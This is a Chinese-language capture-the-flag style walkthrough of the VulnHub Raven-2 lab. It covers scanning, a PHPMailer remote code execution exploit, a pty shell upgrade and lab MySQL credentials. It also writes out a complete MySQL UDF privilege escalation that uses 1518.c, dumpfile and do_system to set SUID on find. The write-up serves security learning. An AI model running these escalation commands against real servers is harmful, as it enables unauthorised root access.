靶机描述:
一、准备工作
kali和靶机都选择NAT模式(kali与靶机同网段)
-
靶场环境
下载链接:Raven: 2 ~ VulnHub
主机发现:
端口扫描:
访问默认端口:
点击BLOG的时候跳转到了wordpress的一个站点,点击内容查看的时候报错了
细心一点可以发现这是域名解析的问题,url由我们输入的ip地址变成了raven.local,我们需要做的是配置电脑的hosts文件,使域名解析到192.168.110.137
现在访问就正常了
dirb扫描靶机网站
扫描到很多东西,主要分为三个web信息目录
依次访问页面,在**http://raven.local/vendor/PATH目录下发现flag1
在vendor目录下的README.md里面看到了PHPMailer(一个功能齐全的PHP电子邮件创建和传输类)
在VERSION目录文件中得知PHPMailer版本号为5.2.16
PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用
searchsploit命令搜索到可利用的漏洞
将相关的脚本文件拷贝
修改脚本内容
然后监听本地端口
升级交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'使用find命令查找flag
成功找到flag2和flag3
查看flag2文件
flag3为图片,在网站下查看
查看mysql的config配置文件
发现了网站的mysql数据库,数据库的账号密码root:R@v3nSecurity
登入mysql服务器,查看mysql版本信息
浏览器搜索关键字
看到可以使用udf提权
kali漏洞库搜索udf
这里使用1518.c
将1518.c下载到本地
-g 生成调试信息-c 编译(二进制)-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。-o:执行命令后的文件名-lc:-l 库 c库名
靶机将icepak.so下载到本地
进入数据库,发现是具有读和写的权限的
use mysql;#进入数据库create table foo(line blob);#创建数据表fooinsert into foo values(load_file('/tmp/icepeak.so'));#插入数据select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so';#( Foo表成功插入二进制数据,然后利用dumpfile函数把文件导出outfile 多行导出,dumpfile一行导出outfile会有特殊的转换,而dumpfile是原数据导出新建存储函数)create function do_system returns integer soname 'icepeak.so';#(创建自定义函数do_system 类型是integer,别名soname文件名字然后查询函数是否创建成功)select * from mysql.func;select do_system('chmod u+s /usr/bin/find');#(调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令)quit
退出mysql,使用/usr/bin/find提权
可以看到权限已经为root了,切换其根目录,发现最后一个flag,Raven2靶机所有flag查找完毕,至此,Raven2靶机渗透结束
原文始发于微信公众号(网络安全学习爱好者):vulnhub靶场之Raven-2渗透笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论